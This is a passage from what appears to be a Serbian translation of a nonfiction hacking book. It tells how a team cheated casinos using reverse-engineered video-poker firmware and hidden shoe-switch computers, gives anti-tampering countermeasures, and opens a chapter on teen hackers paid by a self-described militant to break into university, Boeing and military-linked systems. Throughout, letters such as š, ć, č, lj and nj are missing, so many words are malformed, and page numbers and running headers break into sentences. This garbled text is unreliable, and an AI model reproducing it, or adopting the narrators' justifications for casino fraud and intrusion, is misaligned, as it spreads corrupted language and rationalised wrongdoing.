Tim je poeo da isprobava novu emu, a to je prilino uticalo na ihove ivce. Naravno, vie nije bilo sumivog trkaa do govornice pre
svakog osvajaa novca. Ali, i pored svih generalnih proba u ihovoj
kancelariji, premijera je bilo izvoee pred prilino velikom publikom uvek sumiavih udi iz obezbeea.
Ovaj put program je napraven tako da due mogu da sede za jednim aparatom, osvajajui vie maih, i mae sumivih svota. Aleks i
Majk se priseaju napetosti dok opisuju kako je sistem radio.
Aleks: Obino bih raunar stavao u dep, u neto to je liilo

na mali tranzistorski radio. Sproveo bih icu od raunara u
arapu i u prekida koji se nalazio u cipeli.
Majk: Ja sam svoj lepio za lanak. Prekidae smo napravili od
komadia ploe za konstruisae modela elektronskih kola
(engl. breadboard). Komadi su bili kvadratii strane oko jedan
15
in, s minijaturnim dugmetom. Zaili smo i pare lastia koje

e ii oko palca. Onda iseete rupu u uloku Dr. Sholl da bi
ureaj stojao mirno u cipeli. Bilo je neudobno samo ako ste ga
nosili ceo dan tada je postajalo pravo muee.
Aleks: I onda uete u kazino i pokuavate da izgledate smireno, ponaate se kao da nema niega, kao da vam pantalone
nisu pune ica. Odete tamo i ponete da igrate. Imali smo
ifru, kao Morzeova azbuka. Ubacite pare i napravite neto
kredita da ne biste morali stalno da ubacujete novie, i ponete da igrate. Oznake za podeene karte unesete pritiskajui
dugme u cipeli.
Signal od dugmeta u cipeli odlazi do raunara u depu pantalona. Za ranije maine trebalo je sedam ili osam karata da
biste sinhronizovali raunar. Aparat podeli pet karata,
povuete jo tri, to je uobiajena stvar. Na primer, zadrite
par, a zamenite ostale tri, i dobijete osam karata.
Majk: Kd koji ste ukucavali preko dugmeta u cipeli bio je
binaran i koristio je tehniku komprimovaa slinu onome to
se naziva Hafmanov kd. Tako je dug pa kratak pritisak
oznaavao jedan-nula, to je binarna oznaka za dva. Dva
duga pritiska bila su jedan-jedan, binarna oznaka za tri, itd.
Ni za jednu kartu nam nije trebalo vie od tri pritiska.
Aleks: Ako ste dugme drali pritisnuto tri sekunde, to je znailo otkazivae. I [raunar] se odazivao na primer, dupdup-dup je znailo OK, spreman sam za unos. Unoee
podataka smo vebali morali smo da se koncentriemo i
uimo kako se to radi. Nakon nekog vremena, mogli smo da
ukucavamo i dok smo razgovarali sa osobem u kazinu.
Poto bih uneo kd i identifikovao oko osam karata, to je bilo
dovono za sinhronizovae sa oko 99 procenata sigurnosti.
Otprilike u roku od nekoliko sekundi do minut, raunar bi
triput zazujao.
Spreman sam za akciju.
Raunar u depu pronaao je mesto u algoritmu koje predstava upravo podeene karte. Poto je egov algoritam bio isti kao onaj u video poker aparatu, za svako novo deee raunar je znao kojih pet dodatnih
karata eka nakon to igra izabere karte koje e odbaciti, i signalizirao je
koje karte treba zadrati da bi se osvojio dobitak. Aleks je nastavio:
Umee provale
16
Raunar vam java ta da uradite tako to ae signale vibratoru u vaem depu. Vibratore smo nabavili besplatno tako to
smo ih iupali iz starih pejdera. Ako treba da zadrite treu
i petu kartu, kompjuter bi se oglasio sa bip, bip, biiip, bip,
biiip, to ste oseali kao vibracije u svom depu.
Izraunali smo da, ako igramo paivo, imamo izmeu 20 i
40 procenata dobiti, to znai prednost od 40 procenata u svakom deeu. To je odlino najboi svetski igrai blek deka
ostvare oko dva i po procenta.
Ako sedite za aparatom u koji se ubacuje 5 dolara i odjednom
ubacujete po pet kovanica, dvaput u minutu, moete zaraditi
25 dolara za minut. Za pola sata mogli biste lako zaraditi
1.000 dolara. Svaki dan se nekome tako posrei. Oko 5 procenata igraa koji sede i igraju pola sata mogli bi postii toliko.
Ali to im se ne deava svaki put. Mi smo bili u tih 5 procenata
kad god bismo seli.
Svaki put kada bi neko od ih osvojio veu sumu u jednom kazinu,
preao bi u drugi. Obino su uzimali po etiri ili pet dobitaka zaredom.
Kada bi se posle mesec dana vratili u taj kazino, posetili bi ga u drugo
doba dana da bi zatekli drugu smenu osoba, ude koji ih nee prepoznati. Poeli su da poseuju i kazina u drugim gradovima Rinou, Atlantik Sitiju itd.
Putovaa, kockae i osvajae, postepeno su postali rutina. Meutim, jednom prilikom Majk je mislio da je doao trenutak od kog su svi
strepeli. Upravo se naotrio i prvi put je igrao na aparatu u koji se ubacuje 25 dolara, to je poveavalo napetost to je vrednost maine vea,
to vas paivije posmatraju.
Bio sam pomalo nervozan, ali stvari su ile boe nego to sam
oekivao. Osvojio sam oko 5.000 dolara za relativno kratko
vreme. A onda me je jedan ogroman tip potapao po ramenu.
Pogledao sam ga oseajui blagu muninu u stomaku. Pomislio sam: To je to.

Primetio sam da ve neko vreme igrate, rekao je. elite li
roze ili zelenu?
Da sam to bio ja, zapitao bih se: ta da izaberem boju koje elim
da budem kada me prebiju na mrtvo ime? Mislim da bih ostavio sav
svoj novac i pokuao da zbriem. Majk kae da je ve bio dovono iskusan da ostane smiren.
ovek je rekao: elimo da vam poklonimo ou za kafu.
Uhvaen!
Aleks i Majk su se trudili da se disciplinovano dre odreenih pravila
koja e sigurno smaiti verovatnou da nas primete. Na primer, pazili
smo da nikada ne uzimamo previe novca na istom mestu, da na istom
mestu nikada ne osvajamo novac previe esto, da ne uzimamo novac
mnogo dana zaredom.
Majk je odabrao zelenu.

Marko je imao sopstveni napet momenat. ekao je na dobitno
deee kada mu je priao nadzornik kog nije primetio. Udvostruili ste
sumu na pet hiada dolara ba imate sree, rekao je iznenaeno. Starija
gospoa za susednim aparatom progovorila je hrapavim glasom puaa:
Nije to... bila... srea. Nadzornik se ukoio, i postao sumiav. To je
bila peta, zagraktala je. Nadzornik se nasmeio i otiao dae.
Tokom oko tri godine, momci su naizmenino obavali legalne
poslove savetovaa kako bi ouvali svoje vetine i kontakte, i povremeno punili depove za poker aparatima. Kupili su jo dva aparata, ukuujui i najvie korien model video pokera i nastavili da poboavaju
svoj softver.
Na putovaima je svaki od tri lana tima iao u razliit kazino, nisu
ili u oporu, priao je Aleks. Tako smo otili samo jednom ili dvaput,
ali to je bilo glupo. Iako su se dogovorili da e jedan drugom javati ta
nameravaju, povremeno bi se neko od ih iskrao u kockarske gradove ne
prijavujui ostalima. Igrali su samo u kazinima, nikad na mestima kao
to su dragstori ili supermarketi, jer su tamo dobici uglavnom vrlo mali.
17
Umee provale
18
Ali Majk je tu disciplinu shvatao ozbinije i smatrao je da druga

dvojica nisu dovono oprezni. Vie je voleo da osvaja neto mae novca na sat, ali da izgleda kao i drugi tipini igrai. Ako bi deeem dobio dva keca, a kompjuter mu rekao da odbaci jednog ili oba keca da bi
dobio jo boe karte na primer tri andara on to nije radio. U svim
kazinima postoje kamere kojima uprava obezbeee smeteno iznad
dvorane za kockae. One se mogu okretati, fokusirati i zumirati u potrazi za prevarantima, podmienim slubenicima kazina i drugima koji
nisu uspeli da odole tolikom novcu. Ako bi se desilo da neko iz obezbeea viri u Majkov aparat, odmah bi znao da tu nisu ista posla nijedan razuman igra ne bi odbacio par keeva. Niko ko ne vara ne bi
pomislio da slede jo boe karte.
Aleks nije imao tako visoke standarde. Markovi su bili jo nii.
Marko je bio prilino drzak po Aleksovom mieu:
On je vrlo pametan tip, samouk, nikada nije zavrio sredu

kolu, ali je bio jedan od onih sjajnih Istonoevropana. I bio
je vrlo uoiv.
Znao je sve o raunarima, ali je umislio da su udi zaposleni
u kazinima glupi. Nije bilo teko pomisliti tako neto s obzirom na to da smo uspevali da im izvuemo toliki novac. Pa
ipak, ini mi se da je postao previe samouveren.
Previe se osilio, a nije se ni uklapao u profil tipinog igraa jer
je izgledao kao klinac iz inostranstva. Mislim da je zato budio
sume. Takoe, nije iao sa devojkom ili suprugom, koja bi
pomogla da se boe uklopi.
Mislim da je na kraju poeo da radi stvari koje su privlaile
pau. Takoe, kako je vreme prolazilo, svi smo se okuraili,
pa smo poeli da igramo na skupim aparatima koji su davali
boe dobitke, to je operaciju inilo rizinijom.
Iako se Majk s tim ne slae, Aleks je nagovestio da su sva trojica voleli
da rizikuju i da su stalno pomerali granice proveravajui koliko daleko
mogu da idu. O tome je rekao: Jednostavno, stalno poveavate rizik.
Doao je dan kada je Marko u jednom trenutku sedeo za aparatom u
kazinu, a u sledeem je bio okruen gomilom udi iz obezbeea koji
su ga vukli i gurali u zadu sobu za razgovor. Aleks je prepriao dogaaj.
Snimili su mu anfas i profil, i oduzeli mu kompjuter i sav novac koji

je imao oko 7.000 dolara u keu. Nakon oko jednog sata ispitivaa,
ili moda due bio je previe uzrujan da bi bio siguran koliko je trajalo
pustili su ga.
Marko je pozvao svoje partnere na putu kui. Zvuao je izbezumeno. Rekao je: Da vam ispriam ta se desilo. Zeznuo sam stvar.
Majk je odmah otiao u ihov tab. Aleks i ja smo iznuli kada smo
uli ta se desilo. Ja sam poeo da rastavam aparate i bacam delove
svud po gradu.
Aleks i Majk su bili uti to je Marko nepotrebno rizikovao. Nije
hteo da postava dugme u cipelu kao ih dvojica, tvrdoglavo insistrajui da ureaj nosi u depu jakne i pokree ga rukom. Aleks je opisao
Marka kao tipa koji je mislio da su udi iz obezbeea toliko glupi da
je mogao pod ihovim nosem da bude sve drskiji.
Aleks je ubeen da zna ta se desilo, iako nije bio prisutan. (Zapravo,
ih trojica nisu znali da je Marko otiao u kazino, uprkos dogovoru da
se meusobno obavetavaju o planovima.) Po Aleksovom mieu,
19
Bilo je strano jer ste stalno sluali prie o tim tipovima koji
mlate ude kao volove u kupusu. Oni su bili uveni po geslu
J_ policiju, sami emo se postarati za ovo.
Marko je bio uplaen, ali on je vrlo vrst lik. Na neki nain mi
je drago to je ba on uhvaen, ako je iko od nas morao da
padne, jer mislim da je on bio najsposobniji da se izbori s tom
situacijom. Koliko znam, sline stvari je preiveo u Istonoj
Evropi.
Pokazao je lojalnost i nije nas izdao. Nije pomiao partnere
niti bilo ta slino. Bio je nervozan i uznemiren, ali je ostao
vrst pred pabom i rekao im je da je radio sam.
Rekao je: ekajte, da li sam ja uhapen, jeste li vi policija, u
emu je stvar?
Bilo je to ispitivae kao u kriminalistikoj slubi, osim to ti
udi nisu bili policija i nisu imali nikakav stvaran autoritet,
to je pomalo udno. Nastavili su da ga ispituju, ali ga nisu
stvarno maltretirali.
Umee provale
20
Videli su da on osvaja nemogue sume i da se neto udno deava s

egovom rukom. Marko prosto nije brinuo o tome ta bi moglo skrenuti pau osoba i pobuditi sumu.
To je bio kraj i za Aleksa, mada nije skroz siguran da su i ostali prestali da varaju. Na poetku smo odluili da, ako iko od nas bude uhvaen, svi prestajemo. Rekao je: Koliko ja znam, svi smo se toga
pridravali. Ubrzo zatim je, mae siguran, dodao: Bar ja jesam.
Majk se sloio, ali nijedan od ih nikada to pitae nije direktno postavio Marku.
Kazina obino ne tue napadae poput ih etvorice. Razlog za to
je to ne ele da objave da imaju ovakve slabosti, objaava Aleks.
Obino se zavrava reima: Izgubi se pre zalaska sunca. Pustiemo te
ako obea da vie nikada nee kroiti u ovaj kazino.
Epilog
Oko est meseci kasnije, Marko je primio pismo u kom je pisalo da protiv ega nee biti podneta tuba.
Njih etvorica su i dae prijatei, mada danas nisu toliko bliski.
Aleks misli da je u ovoj avanturi zaradio oko 300.000 dolara, a deo tog
novca otiao je Lariju, kao to su se dogovorili. Tri partnera koja su ila
u kazina i preuzela sav rizik, prvo su se dogovorila da e podeliti novac
na jednake delove, ali Aleks misli da su Majk i Marko verovatno uzeli
oko 400.000 do pola miliona dolara svaki. Majk nije potvrdio da je dobio vie od 300.000 dolara, ali priznaje da je Aleks verovatno izvukao
mae od ega.
Radili su oko tri godine. Uprkos novcu, Aleks je bio srean kada je
bilo gotovo: Na neki nain, osetio sam olakae. Sva zabava je iezla.
To nam je postalo kao posao. I to rizian. Ni Majku nije bilo krivo to
se sve zavrilo, i blago se alio da je postalo nekako naporno.
Obojica su na poetku oklevali da ispriaju svoju priu, ali su sa uivaem prihvatili zadatak. A zato i ne bi tokom desetak godina otkako
se sve desilo, nijedan od ih etvorice nikada nikome nije ni proaputao
o tim dogaajima osim suprugama i devojci, koje su bile deo cele stvari.
Na neki nain, bilo je olakae ispriati sve po prvi put, pod zatitom
dogovora o potpunoj anonimnosti. Oigledno su uivali u otkrivau
detaa, a Majk je priznao: To je bila jedna od najuzbudivijih stvari
koje sam ikada uinio.
Aleks verovatno govori u ime svih iznosei svoj stav o ovoj ludoriji:
Aleks kae da tako neto danas ne bi pokuao. Meutim, egovi razlozi e vas moda iznenaditi: Pronaao sam druge naine da doem
do novca. Da je moja finansijska situacija ista kao tada, verovatno bih
pokuao opet. Misli da je ono to su uradili sasvim opravdano.
U ovoj igri make i mia, maka stalno ui nove trikove koje mi izvodi i preduzima odgovarajue mere. Slot maine danas koriste mnogo
boi softver, pa momci nisu sigurni da li bi uspeli ponovo da ih provale.
Ipak, nikada nee postojati savreno reee za bilo koje pitae tehnoloke bezbednosti. Aleks je taj problem slikovito predstavio: Svaki
put kada neki [programer] kae: Niko se nee muiti oko toga, nae se
klinac u Finskoj raspoloen da se pomui.
I to ne samo u Finskoj, nego i u Americi.
SAETAK
Tokom devedesetih, kazina i projektanti kockarskih aparata nisu shvatali neke stvari koje su kasnije postale oigledne. Generator pseudosluajnih brojeva ne generie zaista nasumine brojeve. Umesto toga, on
skladiti listu nasumino poreanih brojeva. U ovom sluaju, to je veoma duga lista: sa stepenom od 2 do 32, ili otprilike milijardu brojeva.
Na poetku ciklusa, program nasumino bira mesto u listi. Ali nakon
toga, sve dok ne pone nov ciklus igre, on koristi sledee brojeve sa liste,
jedan za drugim.
21
Ne oseam se nimalo loe zbog novca koji smo uzeli. To je samo

kap u moru novca u toj industriji. Da budem iskren, nikada
nismo oseali griu savesti, jer su to kazina.
Sve smo lako racionalizovali. Krali smo od kazina koji su krali
starim gospoama nudei igre u kojima ne mogu da dobiju.
Vegas je kao mesto u kom su udi utaknuti u maine za
isisavae novca, i one im isisavaju ivot novi po novi.
Oseali smo se kao da se svetimo Velikom Bratu, a ne kao da
nekoj jadnoj starici otimamo dek pot.
Napravili su igru u kojoj se kae Izaberi odgovarajue karte i
dobie novac. Mi smo birali odgovarajue karte. Jedino to
oni nisu oekivali da to ikome poe za rukom.
Reverznim ineeringom (tj. povratnom analizom) softvera momci

su doli do liste. Sa bilo koje poznate take u nasuminoj listi, oni su
mogli da utvrde sledei broj na listi, a pomou dodatnog poznavaa
brzine ponavaa za konkretnu mainu, mogli su da odrede koliko e
minuta i sekundi proi pre nego to aparat prikae fle rojal.
PROTIVMERE
Umee provale
22
Proizvoai svakog proizvoda koji koristi ROM ipove i softver moraju

predvideti bezbednosne probleme. A svaka kompanija koja koristi proizvode zasnovane na softveru i raunarima to danas znai gotovo svaka kompanija, sve do radi s jednim ovekom bie u opasnosti ako
pretpostavi da su tvorci sistema razmiali o svim egovim slabostima.
Programeri softvera u japanskim slot aparatima napravili su greku jer
nisu razmiali mnogo unapred o svim vrstama napada koji bi mogli
biti izvedeni. Nisu preduzeli nikakve mere bezbednosti kojima bi
spreili ude da dou do firmvera. Trebalo je da predvide da e neko
doi do aparata, ukloniti ROM ip, proitati firmver i doi do programskih instrukcija koje aparatu govore kako da radi. ak i ako su razmotrili tu mogunost, verovatno su pretpostavili da smo poznavae
naina rada maine nije dovono, i smatrali da e sloenost izraunavaa potrebnih za provaivae generatora sluajnih brojeva osuditi
svaki takav pokuaj na neuspeh. To je danas moda i tano, ali u ono
vreme nije bilo.
Recimo da vaa kompanija prodaje hardverske proizvode koji sadre
kompjuterske ipove. ta treba da uradite da biste obezbedili adekvatnu
zatitu protiv suparnika koji hoe da zaviri u va softver, protiv strane
kompanije koja hoe da napravi jeftinu kopiju, ili hakera koji hoe da
vas prevari?
Prvi korak: oteajte dolazak do firmvera. Za to postoji nekoliko
naina, ukuujui sledee:
Kupujte ipove koji su napraveni tako da su osigurani od
napada. Nekoliko kompanija prodaje ipove dizajnirane specijalno za situacije kada postoji velika opasnost od napada.
Koristite pakovae chip on-board dizajn u kom je ip
ugraen u plou sa elektronskim kolima i ne moe se izdvojiti
kao poseban element.
Zapeatite ip epoksidnom smolom, pa e se slomiti ako neko

pokua da ga ukloni s ploe. Da biste poboali ovu tehniku, u
smolu dodajte aluminijumski prah. Ukoliko napada pokua da
ukloni ip zagrevaem smole, aluminijum e ga unititi.
Koristite dizajn Ball Grid Array (BGA). U takvom rasporedu
konektori ne izlaze iz bokova ipa, ve ispod ega, pa je teko,
ak i nemogue, uhvatiti tok signala iz ipa dok je on postaven
na plou.
Jo jedna protivmera je uklaae svih oznaka sa ipa. Time ete napadaa liiti informacija o proizvoau i vrsti ipa.
Prilino uobiajen postupak, koji su koristili proizvoai aparata iz
ove prie, zahteva koriee kontrolnih zbirova (heirae) ukuivae rutine check-sum u softver. Ukoliko se program izmeni, kontrolni zbir nee biti ispravan i softver nee pokrenuti ureaj. Meutim,
umeniji hakeri koji su upoznati sa ovim pristupom, jednostavno
pregledaju softver da bi videli postoji li u emu rutina check-sum, i iskue je ukoliko je pronau. Znai, mnogo je boe da iskoristite jednu
ili vie metoda fizike zatite ipa.
Ukoliko je va firmver privatan i vredan, pregledajte najboe izvore

podataka o bezbednosti i otkrijte koje tehnike hakeri trenutno koriste.
Prenosite najnovije informacije svojim projektantima i programerima.
I obavezno preduzmite sve odgovarajue korake da biste postigli najvii
nivo bezbednosti srazmeran trokovima koje biste mogli imati zbog
upada.
ZAKLJUAK
23
Poglavlje 2
Kad teroristi pozovu
Ne znam zato sam nastavio s tim. Zbog opsesivne prirode? ei
za novcem? ude za moi? Mogao bih nabrojati mnogo razloga.
ne0h
vadesetogodii haker koji se potpisuje kao Comrade (Drug)

ovih dana provodi vreme u kui u finom kraju Majamija, koja
pripada emu i egovom bratu. Otac ivi s ima, ali samo
zato to je brat jo uvek maloletan, a Sluba za brigu o deci zahteva da
odrasla osoba ivi u kui dok deak ne napuni 18. Brai to ne smeta, a
tata ima svoj stan na drugom mestu, i preselie se u ega kad za to
doe vreme.
Comradeova mama je umrla pre dve godine i ostavila kuu sinovima
jer su ona i ihov otac bili razvedeni. Ostavila im je i neto gotovine.
Njegov brat ide u sredu kolu, a Comrade samo visi po kraju. Vei
deo porodice to ne odobrava, ali on kae da ga uopte nije briga. Kada
vrlo mladi dospete u zatvor zapravo, ako ste najmlaa osoba koja je
ikada osuena kao haker na osnovu federalne optunice iskustvo e
verovatno promeniti va sistem vrednosti.
Naravno, hakerisae ne poznaje meunarodne granice, pa nije udno to je Comradeov prijate haker, ne0h (nio), otprilike 4.500 km daleko. Hakerisae ih je zbliilo i skrenulo ih na stranputicu koja je,
ispostavilo se, vodila slueu interesima meunarodnog terorizma preko upada u veoma osetive raunarske sisteme. Danas nije lako nositi se
s tim teretom.
25
Godinu dana stariji od Comradea, ne0h kae: Koristio sam raunare otkad sam mogao da dohvatim tastaturu. Njegov otac je imao
prodavnicu raunarske opreme i vodio je deaka sa sobom na sastanke s
klijentima. Deak je sedeo na oevom krilu tokom prodaje. Do svoje jedanaeste godine ve je pisao dBase kd za potrebe oevog posla.
U meuvremenu, ne0h je naiao na kopiju kige Takedown (Hyperion Press, 1996) veoma netaan opis mojih hakerskih akcija, moje tri
godine u bekstvu, i potrage FBI-ja za mnom. ne0h je bio oaran kigom:
Umee provale
26
Inspirisao si me. Ti si bio moj j_ni mentor. Proitao sam sve o

onome to si radio. Hteo sam da postanem slavan kao ti.
To ga je motivisalo da postane haker. Svoju sobu je opremio raunarima, razvodnicima za umreavae, gusarskom zastavom dugom dva
metra i krenuo mojim stopama.
ne0h je poeo da stie solidno hakersko znae i sposobnosti. Prvo je
stekao vetine, a diskrecija je dola kasnije. Koristei hakerski termin za
klince poetnike, objasnio je: Dok sam pisao deje skriptove, meao
sam matine strane Web prezentacija i ostavao svoju adresu e-pote.
Visio je na IRC prezentacijama (engl. Internet Relay Chat, interaktivni
razgovor na Internetu) elektronskim priaonicama u kojima se sreu
udi sa zajednikim interesovaima i u realnom vremenu razmeuju
poruke o pecau, starim avionima, kunim pivarama, ili bilo kojoj od
hiada drugih tema, ukuujui i hakerisae. Kada na IRC prezentaciji
unesete tekst, svi koji su u to vreme na mrei videe ta ste napisali i
mogu vam odgovoriti. Mada to mnogi redovni korisnici IRC-a ne znaju,
komunikacija se lako moe evidentirati. Te evidencije dosad verovatno
sadre skoro isti broj rei kao sve kige u Kongresnoj biblioteci a do
teksta upisanog u urbi, bez previe razmiaa o posledicama, moe se
doi godinama kasnije.
Comrade i ne0h su provodili vreme na nekoliko istih IRC prezentacija i tako se rodilo prijatestvo na dainu. Hakeri se esto udruuju radi
razmeivaa informacija ili izvoea grupnih napada. ne0h, Comrade
i jo jedan klinac odluili su da naprave sopstvenu grupu koju su nazvali
Keebler Elves. Jo nekoliko hakera je imalo pristup razgovorima grupe,
ali tri prva lana nisu ostalima govorili o svojim napadima. Provaivali
smo u vladine prezentacije radi zabave, rekao je Comrade. Proceuje
da su provalili u par stotina navodno zatienih vladinih prezentacija.
Razliite grupe hakera okupaju se na nekoliko IRC kanala. Meu

ima se izdvaja mrea Efnet. To je prezentacija koju Comrade opisuje
kao ne ba kompjutersko podzeme to je prilino velika grupa servera. Ali, na Efnetu je bilo nekih mae poznatih kanala, mesta koja niste
mogli sami da pronaete, ve je za ih morao da vam kae drugi haker
ije ste poveree zadobili. Ti kanali su, kae Comrade, bili prilino
ilegalni.
Terorista Kalid baca mamac
Oko 1999, sa mnom je putem e-pote u kontakt stupio ovek

koji je rekao da je militantni aktivista i da se nalazi u Pakistanu. Predstavio se kao Kalid Ibrahim. Rekao mi je da je radio
za pakistanske militantne grupe.
Da li bi neko u potrazi za naivnim klincima hakerima zaista sebe obeleio kao teroristu ak i pre 11. septembra? Na prvi pogled to zvui
apsurdno. Taj ovek je kasnije tvrdio da je iao u kolu u SAD, da se i
sm pomalo bavio hakerisaem, i da se povezao s hakerima dok je bio u
Americi. U tom sluaju, on je mogao znati, ili je mislio da zna, kako hakeri razmiaju. Svaki haker je do neke mere buntovnik koji ivi po
razliitim standardima i uiva u savladavau sistema. Ako hoete da privuete hakera, moda i nije tako glupo objaviti da i sami krite pravila i
da ste autsajder. Moda bi pria upravo tako postala uverivija, a potencijalni sauesnici mae oprezni i sumiavi.
27
Poglavlje 2: Kad teroristi pozovu
Oko 1998, na tim prilino ilegalnim kanalima, Comrade je poeo da

nailazi na razgovore o tipu koji se motao unaokolo, a predstavao se
kao RahulB. (Kasnije je koristio i identifikaciju Rama3456). Svima je
bilo poznato da je on traio hakere koji e upadati u vladine i vojne raunare prezentacije .gov i .mil, kae Comrade. Kruile su glasine da
je on radio za Bin Ladena. To je bilo pre 11. septembra, pa Bin Laden
nije bilo ime koje ste mogli svaki dan uti u vestima.
Na kraju su se Comradeovi putevi ukrstili s putevima tajanstvenog oveka koji e mu se predstaviti kao Kalid Ibrahim. Razgovarao sam s im
nekoliko minuta [na IRC-u] i jednom smo priali telefonom. ovek je
imao strani akcenat i definitivno je zvualo kao da zove iz inostranstva.
I ne0h je stupio s im u vezu. Kalid je s im bio direktniji i otvoreniji.
Umee provale
28
A bilo je tu i novca. ne0h je od Kalida dobio ponudu od 1.000 dolara

da upadne u raunarske mree jednog kineskog univerziteta mesto
koje ne0h naziva kineski MIT (MIT Tehnoloki institut Masausetsa) i iz baze nabavi podatke o studentima. Pretpostavio je da je to test i
za egove hakerske sposobnosti i za egovu genijalnost: kako da upadnete u raunarski sistem kada ne umete da itate jezik? I jo tee: kako da
se lano predstavite kada ne govorite jezik?
Ispostavilo se da jezik nije nikakva prepreka za nekog kao to je ne0h.
Poeo je da boravi na IRC prezentacijama koje je koristila hakerska
grupa gLobaLheLL i preko te grupe se povezao sa studentom raunarskih nauka na kineskom univerzitetu. Povezao se s im i zatraio nekoliko korisnikih imena i lozinki. Informacije za prijavivae stigle su
ubrzo zatim, po sistemu haker hakeru, bez postavaa pitaa. ne0h je
otkrio da je bezbednost raunara na univerzitetu bila slaba do uasna, to
je naroito neobino za tehniki univerzitet za koji bi se oekivalo da
moe mnogo boe. Veina studenata imala je lozinke iste kao korisnika
imena istu re ili frazu.
Kratka lista koju je student dostavio bila je dovona da ne0h dobije
pristup kako bi mogao da pone elektronsko ukae. Tako je otkrio
studenta zvaemo ga eng koji je pristupao FTP prezentacijama
(za preuzimae podataka) u SAD. Meu tim FTP lokacijama, bila je i
warez prezentacija mesto za preuzimae piratskog softvera. Koristei
standardan trik lanog predstavaa, ne0h je skitao po mrei fakulteta i
skupao lokalni studentski argon. To je bilo lake nego to se ini jer
oni uglavnom govore engleski, kae ne0h. Sa engom se povezao preko naloga koji je omoguio da sve izgleda kao da mu ne0h ae poruke
iz laboratorije za raunarske nauke na fakultetu.
Ja sam iz Bloka 213, elektronski je rekao engu, i direktno mu
zatraio imena studenata i adrese e-pote, kao to bi uradio svaki drugi
student zainteresovan za kontakt s kolegama. Poto je veina lozinki
bila jednostavna, ulazak u studentske datoteke nije iziskivao previe
mozgaa.
Vrlo brzo mogao je da isporui Kalidu podatke iz baze o otprilike sto
studenata. Dao sam mu to, a on je rekao: Imam sve to mi treba. Kalid je bio zadovoan. Oigledno mu ta imena uopte nisu trebala, samo
je hteo da vidi moe li ne0h zaista da pribavi informacije iz tako udaenog izvora. Otprilike tada je poela naa veza, kae ne0h. Mogao sam
da obavim posao, on je to znao, i poeo je da mi daje druge zadatke.
Nastavio sam jer sam tvrdoglav. Uzbuivala me je pomisao da

u biti plaen za to to radim. I mislio sam: Moda se novac
stvarno usput zaturio, moda e mi ovaj put platiti.
Ne znam zato sam nastavio s tim. Zbog opsesivne prirode?
ei za novcem? ude za moi? Mogao bih nabrojati mnogo
razloga.
U isto vreme dok je dodeivao zadatke da ih ne0h reava, Kalid je
krstario IRC prezentacijama traei druge zainteresovane igrae. Comrade je bio zainteresovan, mada je bio oprezan kada je trebalo prihvatiti
novac.
Koliko sam shvatio, on je plaao udima, ali ja nikada nisam

hteo da mu dam svoje podatke kako bih primio novac. Pomislio sam to to ja radim samo je razgledae, ali ako ponem
da primam pare, postau pravi kriminalac. S im sam uglavnom razgovarao preko IRC-a i s vremena na vreme mu dobacivao poneku datoteku sa IP adresama sistema.
Novinar Nil Makaj razgovarao je s jo jednom ribom koju je Kalid
upecao u svoju mreu tinejderom iz Kalifornije ija je identifikacija
bila Kameleon (Chameleon), i koji je danas suosniva uspene kompanije za bezbednost. Pria koju je Makaj objavio na prezentaciji wired.com1,
poklapala se sa detaima koje su ispriali ne0h i Comrade. Jedne noi
sam bio na IRC-u kada je taj tip rekao da mu treba DEM softver. Ja ga
29
Rekavi da e mu ugovorenih hiadu dolara poslati potom, Kalid je

poeo da zivka mobilnim otprilike jednom nedeno, kako kae ne0h,
obino dok je vozio. Sledei zadatak bio je upad u raunarski sistem
indijskog Centra za istraivae atomske energije (Bhabha Atomic Research Center). Centar je koristio radnu stanicu Sun koja je poznata
svim hakerima. ne0h je lako uao u u, ali je otkrio da maina ne sadri
nikakve zanimive informacije i da je samostalna nije povezana ni sa
jednom mreom. Kalid nije delovao zabrinuto zbog neuspeha.
U meuvremenu, novac za upad u kineski univerzitet nije stigao.
Kada je ne0h pitao za ega, Kalid se iznervirao. Nisi ga dobio? Poslao
sam ti ke u roendanskoj estitki!, tvrdio je. Bila je to otrcana fraza:
Poslali smo ek potom, ali je ne0h ipak rado nastavio da prihvata
zadatke. Zato? Danas odgovor na to trai introspekcijom.
Umee provale
30
nisam imao i samo sam se izmotavao s im, tvrdio je haker. Kalid se u

to vreme ve uozbiio: DEM je skraenica za Defense Information Systems Network Equipment Manager softver za mree koji je koristila
vojska. Program je skinula grupa hakera Masters of Downloading, i
kruile su glasine da do ega moete doi ako ga zatraite od prave osobe. Niko ne zna da li se Kalid ikada doepao tog programa ili bar niko
nee da prizna. Zapravo, nije potpuno sigurno ni da bi mu taj softver ita
vredeo ali on je oigledno mislio da bi. Kalid je zavrio svoje igre s kineskim univerzitetima i slinim sitnim poslovima.
Pokuao je da se ukui u ono to su momci u grupi radili, priao
nam je ne0h. Kalid se javao hakerima tokom godinu i po dana: Nije
bio neko ko bi se sporadino pojavivao, javao se redovno. Bio je tu i
svi su znali da je to egova stvar. Kada kae egova stvar, ne0h misli na upadae u vojne prezentacije ili raunarske sisteme komercijalnih kompanija koje rade na vojnim projektima.
Kalid je traio da ne0h upadne u Lockheed Martin i nabavi eme
odreenih avionskih sistema koji su se u toj kompaniji pravili za Boing.
ne0h je uspeo da delimino prodre u Lockheed, oko tri koraka u unutrau mreu, ali nije uspeo da ode dube od dva servera (doao je do
nivoa koji udi iz bezbednosti nazivaju demilitarizovana zona ili
DMZ niija zema). To nije bilo dovono da proe barijere koje su
titile najosetivije korporacijske podatke, i nije mogao da pronae zahtevane informacije.
[Kalid] se razdraio. Otprilike je rekao: Vie ne radi za mene. Ne moe nita da obavi. Ali onda me je optuio da sam
zadrao informacije za sebe.
Potom je rekao: Zaboravi Lockheed Martin. Idi direktno na
Boing.
ne0h je otkrio da Boing nije toliko obezbeen, ako se dovono
potrudite. On je upao iskoristivi poznatu slabost Boingovog sistema
izloenost Internetu. Poto je instalirao ukalo (program za nadgledae protoka podataka, engl. sniffer), mogao je da oslukuje sve pakete
podataka koji su ulazili u raunar i izlazili iz ega program je radio
kao prisluni ureaj za raunare. Tako je doao do lozinki i neifrovanih
e-poruka. Informacije koje je skrpio iz e-poruka otkrile su dovono
podataka za ulazak u internu mreu.
Pronaao sam est ili sedam ema za vrata i nos Boinga 747
samo prolazei kroz tekstualne e-poruke. Ljudi su slali neifrovane priloge uz poruke. Zar to nije sjajno?! (Tu se zasmejao.)
Kalid je bio ushien. Rekao je da e mi dati 4.000 dolara. To
se, naravno, nikada nije desilo.
Veeraa meta: SIPRNET

Kalid se nije trudio da Comradeu daje probne zadatke. Od samog poetka, pria ovaj haker, Kalida su zanimali samo vojska i SIPRNET.
